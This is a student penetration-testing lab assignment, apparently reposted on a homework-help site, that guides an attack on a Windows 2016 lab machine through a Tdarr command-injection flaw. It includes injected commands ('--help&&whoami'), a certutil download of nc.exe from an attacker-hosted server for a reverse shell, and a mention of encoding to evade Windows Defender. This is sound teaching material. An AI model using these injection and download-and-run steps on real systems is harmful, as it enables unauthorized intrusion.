Simulate a real-life penetration testing on a windows 2016

UK Tutor Service, UK Assignment HelpUK Tutor Service
Post New Homework

Lab: Penetration Testing Lab

Introduction to the Lab
This is a penetration testing lab created to simulate a real-life penetration testing on a windows 2016 domain controller. This lab was customized specially for you using the detection Lab
This lab is divided into 6parts, and we would be following the Penetration testing phases.
1. Planning
2. Reconnaissance and Information Gathering
3. Enumeration and scanning
4. Attack/gaining access and Exploitation
5. Persistence
6. Analysis and reporting

Requirements
- Kali Linux
- Install Nessus on ubuntu/windows or any OS of your choice (optional) (get bonus of 2 marks for running Nessus credentialed scan on the target)
- (optional) Show another way to get reverse shell and get extra 2 marks bonus. We used netcat in this lab, show another way to earn bonus (either this or Nessus for the bonus mark)
- The vulnerable windows machine provided by instructor

Phases of a Penetration Test

Part 1: Planning
Rules of engagement document - We already have the rules of engagement for the client. See below
Scope of Work
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).
Additionally, the client has provided the following scope allowances:
- Any tools or techniques are permitted in this engagement; however, we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Only the IP address assigned to your machine is in scope
- Rules of engagement completed
- Signing and Kickoff Call

Part 2: Reconnaissance and Information Gathering
1. Netdiscover - Netdiscover is a simple ARP scanner which can be used to scan for live hosts in a network
- Run netdiscover to discover all live hosts within our subnet
o Command: netdiscover -i eth0 (now we see all IP addresses within the subnet)

Part 3: Enumeration and scanning
In this phase, we will begin by running our scans. We would do this because this scan may take time depending on the vulnerabilities in the target host
1. Run Nessus and Nmap
• Please note Nessus is optional for your assignment

2. Nessus (optional)
• Nessus is a remote security scanning tool, which scans a computer and discovers any vulnerabilities
o Scan your target host

3. Nmap - Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses
• Run a nmap scan against the target. Make sure to scan all ports.
o Command - nmap -sV -sC -p- TargetIP

4. OSINT: We will do some opensource intelligence to know more about the discovered ports and services (Wait, lets run our Nessus scan first(optional))
• The web application we are researching on is Tdarr
Tdarr is a popular conditional transcoding application for processing large (or small) media libraries and the proof of concept for the exploitation was released on 10th of March 2022. I believe it is really cool to play with an exploit that was released just last week without a patch yet.
Lets do some more enumeration using some more tools
Nikto:Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems
• Command: nikto -h "IP address"
o E.g.nikto -h http://192.168.80.212:8266

5. Dirbuster
• Dirbuster is a tool used to brute-force URIs directories
o Command: dirbhttp://IPAddress:port (sometimes it may just have the default port 80 or 443)
E.gdirb http://192.168.80.218:8266

After the first 3 stages of our methodology, it's time to do some exploitation. Follow the demo fromin class to exploit the vulnerability or follow the steps in part 4.

Part 4: Attack/gaining access and Exploitation
Time to have some fun. Once the vulnerability has been detected during scanning and enumeration, we will try to see how to gain internal information about our victim by exploiting this vulnerability. Some information to gain after exploiting this vulnerability includes internal IP address, services running tohelp us exploit our target system.
Just as we did in class, interact with the internal host on the vulnerable application using its vulnerability. Make sure to take screenshots. You would need them for your reports.
Run the following
• --help&&ipconfig
• --help&&whoami
• --help&&ping 8.8.8.8 (let's see if our host can ping the internet)
• --help&&ping "YourkaliIP" (Try if your victim can ping your kali IP address)
Next step would be to try gain access into our target system through a remote code execution
In this demonstration, we would be using a tool called netcat. We would transfer netcat to our victim machine using another tool called certutil.
(Wehave to live off the land). Checkout a great resource later for tools Penetration testers use to live of the land "https://lolbas-project.github.io/"
1. Netcat:Netcat aka nc is an extremely versatile tool. It allows users to connect to specific ports and send and receive data. It also allows machines to receive data and connections on specific ports, which makes nc a very popular tool to gain access.
• Search for netcat on your kali using the command -locate nc.exe
• Make a copy of netcat to your present directory using the command -
o cp /usr/share/path/path/nc.exe .
o e.gcp /usr/share/windows-resources/binaries/nc.exe .

2. Python http server: Host a python http server on your kali linux to send your nc.exe binary into the victim machine.
Note: we would be sending this to the temp folder as windows defender would block and delete this in a regular folder. Sometimes windows defender blocks binaries dropped in the temp folder, as penetration testers, we can encode this using base 64 to trick windows defender. That is beyond the scope of this class.

• Command to host httpserver: python -m http.server 80
• Note: Run your http server in the same folder your netcat was copied into and leave it running while you open another command line tab in your kali VM
Now we are hosting our http server, we can run a command on our victim to download nc.exe to the victim's temp folder.
3. Certutil: This is a windows binary used for handling certificates, we would be using it to transfer files in this lab
• command to transfer a file (run this command on the vulnerable web application)

• --help&&certutil.exe -f -split -urlcachehttp://YourKaliIP/nc.exe C:\Windows\Temp\nc.exe
e.g. --help&&certutil.exe -f -split -urlcachehttp://192.168.80.182/nc.exe C:\Windows\Temp\nc.exe
Note: make sure your http server is running where your nc.exe is saved, if your http server is not running or its not running where netcat is saved, you will be unable to download it.
You should get a success after running this command (make sure to take screenshot of the success, you would need it for your report)
4. Transfer confirmation: Confirm your nc.exe is sent to your victim machine by using the command. This would list the files in the temp folder
• --help&&dir C:\windows\Temp\
5. Remote code execution: Remote Code Execution or execution, also known as Arbitrary Code Execution, is a concept that describes a form of cyberattack in which the attacker can solely command the operation of another person's computing device or computer

6. Reverse shell
A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

Part 5: Persistence
Remember we do not need to remain persistence because we are not attackers, we are ethical hackers/Penetration testers. We just want to show our client that we were able to breach their network and provide adequate evidence that this occurred

Part 6: Analysis and Reporting
Create a detailed report showing the steps you did in this penetration testing using the template provided by the instructor.
Your report should have the following sections
o Table of Content
o Purpose
o Scope
o Executive Summary (Remember, executive summaries are for executives and make sure this section isnon-technical)
o Technical details (This would include all your findings with screenshots for example screenshot of your nmap scan results, nikto results, proof of exploit on the vulnerable machine etc)
o Your report should include at least 20 screenshotsof your methodologies
o See sample reports provided by Instructoron DC Connect for guide

Attachment:- Penetration_Testing_Lab.rar
Post New Homework

Post Feedback

Captcha

Tutor service in UK?

  • UK Assignment Help
  • UK Assessments Help
  • UK Custom Writing Services
  • Help with UK Studies
  • Paper/Essay Editing-Formatting
  • Management/Programming/Engineering Help
Order Now
Most Recent Posts
UK Perdisco Assignment Help, UK PERDISCO Practice Set Help
University of Brighton, Assignment Help, Tutor Help UK
University for the Creative Arts, Assignment Help UK
The University of Warwick, Assignment Help UK
University of Bradford Assignment Help, Tutor Service UK
University of Abertay Dundee, Assignment Help UK
The Arts University College of Bournemouth, Assignment Help
The University of Sheffield, Assignment Help, UK Tutors Help
The University of Bradfordshire, Assignment Help
University of Aberdeen, Assignment Help, UK Tutors

Popular Tags

Looking tutor’s service for getting help in UK studies or college assignments? Order Now